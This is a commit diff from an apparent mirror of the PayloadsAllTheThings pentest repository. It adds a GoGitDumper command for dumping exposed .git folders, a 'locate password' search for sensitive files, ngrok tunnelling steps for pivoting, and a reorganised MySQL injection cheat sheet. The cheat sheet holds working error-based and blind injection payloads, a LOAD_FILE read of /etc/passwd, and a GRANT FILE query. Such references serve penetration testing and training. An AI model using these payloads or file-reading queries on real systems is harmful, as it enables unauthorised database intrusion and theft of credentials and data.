mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
GoGitDumper + MySQL summary rewrite
This commit is contained in:
parent
b4633bbb66
commit
13864bde04
@ -3,6 +3,7 @@
|
|||||||
- [GIT - Source code management](#git---source-code-management)
|
- [GIT - Source code management](#git---source-code-management)
|
||||||
- [Github example with a .git](#github-example-with-a-git)
|
- [Github example with a .git](#github-example-with-a-git)
|
||||||
- [Automatic way : diggit.py](#automatic-way--diggitpy)
|
- [Automatic way : diggit.py](#automatic-way--diggitpy)
|
||||||
|
- [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
|
||||||
- [Automatic way : rip-git](#automatic-way--rip-git)
|
- [Automatic way : rip-git](#automatic-way--rip-git)
|
||||||
- [Automatic way : GitHack](#automatic-way--githack)
|
- [Automatic way : GitHack](#automatic-way--githack)
|
||||||
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
|
- [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
|
||||||
@ -108,6 +109,15 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
|||||||
-o is a hash of particular Git object to download
|
-o is a hash of particular Git object to download
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Automatic way : GoGitDumper
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
go get github.com/c-sto/gogitdumper
|
||||||
|
gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/
|
||||||
|
git log
|
||||||
|
git checkout
|
||||||
|
```
|
||||||
|
|
||||||
### Automatic way : rip-git
|
### Automatic way : rip-git
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -17,6 +17,7 @@
|
|||||||
* [Files containing passwords](#files-containing-passwords)
|
* [Files containing passwords](#files-containing-passwords)
|
||||||
* [Last edited files](#last-edited-files)
|
* [Last edited files](#last-edited-files)
|
||||||
* [In memory passwords](#in-memory-passwords)
|
* [In memory passwords](#in-memory-passwords)
|
||||||
|
* [Find sensitive files](#find-sensitive-files)
|
||||||
* [Scheduled tasks](#scheduled-tasks)
|
* [Scheduled tasks](#scheduled-tasks)
|
||||||
* [Cron jobs](#cron-jobs)
|
* [Cron jobs](#cron-jobs)
|
||||||
* [Systemd timers](#systemd-timers)
|
* [Systemd timers](#systemd-timers)
|
||||||
@ -139,6 +140,18 @@ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
|
|||||||
strings /dev/mem -n10 | grep -i PASS
|
strings /dev/mem -n10 | grep -i PASS
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Find sensitive files
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ locate password | more
|
||||||
|
/boot/grub/i386-pc/password.mod
|
||||||
|
/etc/pam.d/common-password
|
||||||
|
/etc/pam.d/gdm-password
|
||||||
|
/etc/pam.d/gdm-password.original
|
||||||
|
/lib/live/config/0031-root-password
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
## Scheduled tasks
|
## Scheduled tasks
|
||||||
|
|
||||||
### Cron jobs
|
### Cron jobs
|
||||||
|
@ -130,6 +130,22 @@ plink -l root -pw mypassword 192.168.18.84 -R
|
|||||||
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
|
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## ngrok
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# get the binary
|
||||||
|
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
|
||||||
|
unzip ngrok-stable-linux-amd64.zip
|
||||||
|
|
||||||
|
# log into the service
|
||||||
|
./ngrok authtoken 3U[REDACTED_TOKEN]Hm
|
||||||
|
|
||||||
|
# deploy a port forwarding for 4433
|
||||||
|
./ngrok http 4433
|
||||||
|
./ngrok tcp 4433
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Basic Pivoting Types
|
## Basic Pivoting Types
|
||||||
|
|
||||||
| Type | Use Case |
|
| Type | Use Case |
|
||||||
|
@ -8,13 +8,15 @@
|
|||||||
* [Extract database with information_schema](#extract-database-with-information-schema)
|
* [Extract database with information_schema](#extract-database-with-information-schema)
|
||||||
* [Extract data without information_schema](#extract-data-without-information-schema)
|
* [Extract data without information_schema](#extract-data-without-information-schema)
|
||||||
* [Extract data without columns name](#extract-data-without-columns-name)
|
* [Extract data without columns name](#extract-data-without-columns-name)
|
||||||
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
* [MYSQL Error Based](#mysql-error-based)
|
||||||
* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
|
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
||||||
* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
|
* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
|
||||||
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
|
||||||
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
* [MYSQL Blind](#mysql-blind)
|
||||||
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
|
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
||||||
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
||||||
|
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
|
||||||
|
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
||||||
* [MYSQL Time Based](#mysql-time-based)
|
* [MYSQL Time Based](#mysql-time-based)
|
||||||
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
||||||
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
|
* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
|
||||||
@ -108,7 +110,12 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## MYSQL Error Based - Basic
|
|
||||||
|
|
||||||
|
|
||||||
|
## MYSQL Error Based
|
||||||
|
|
||||||
|
### MYSQL Error Based - Basic
|
||||||
|
|
||||||
Works with `MySQL >= 4.1`
|
Works with `MySQL >= 4.1`
|
||||||
|
|
||||||
@ -117,7 +124,7 @@ Works with `MySQL >= 4.1`
|
|||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - UpdateXML function
|
### MYSQL Error Based - UpdateXML function
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
@ -134,7 +141,7 @@ Shorter to read:
|
|||||||
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - Extractvalue function
|
### MYSQL Error Based - Extractvalue function
|
||||||
|
|
||||||
Works with `MySQL >= 5.1`
|
Works with `MySQL >= 5.1`
|
||||||
|
|
||||||
@ -146,7 +153,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
|
|||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Blind with substring equivalent
|
## MYSQL Blind
|
||||||
|
|
||||||
|
### MYSQL Blind with substring equivalent
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
?id=1 and substring(version(),1,1)=5
|
?id=1 and substring(version(),1,1)=5
|
||||||
@ -156,7 +165,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
|
|||||||
?id=1 and (select mid(version(),1,1)=4)
|
?id=1 and (select mid(version(),1,1)=4)
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Blind using a conditional statement
|
### MYSQL Blind using a conditional statement
|
||||||
|
|
||||||
TRUE: `if @@version starts with a 5`:
|
TRUE: `if @@version starts with a 5`:
|
||||||
|
|
||||||
@ -174,7 +183,7 @@ Response:
|
|||||||
HTTP/1.1 200 OK
|
HTTP/1.1 200 OK
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Blind with MAKE_SET
|
### MYSQL Blind with MAKE_SET
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
@ -183,7 +192,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
|||||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Blind with LIKE
|
### MYSQL Blind with LIKE
|
||||||
|
|
||||||
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
|
['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
|
||||||
|
|
||||||
@ -221,6 +230,12 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
|
|||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
|
If you are `root` on the database, you can re-enable the `LOAD_FILE` using the following query
|
||||||
|
|
||||||
|
```sql
|
||||||
|
GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
|
||||||
|
```
|
||||||
|
|
||||||
## MYSQL Write a shell
|
## MYSQL Write a shell
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
@ -265,3 +280,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
|
|||||||
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
|
- [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
|
||||||
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
|
- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
|
||||||
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
|
- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
|
||||||
|
- [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
|
||||||
|
- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
|
Loading…
Reference in New Issue
Block a user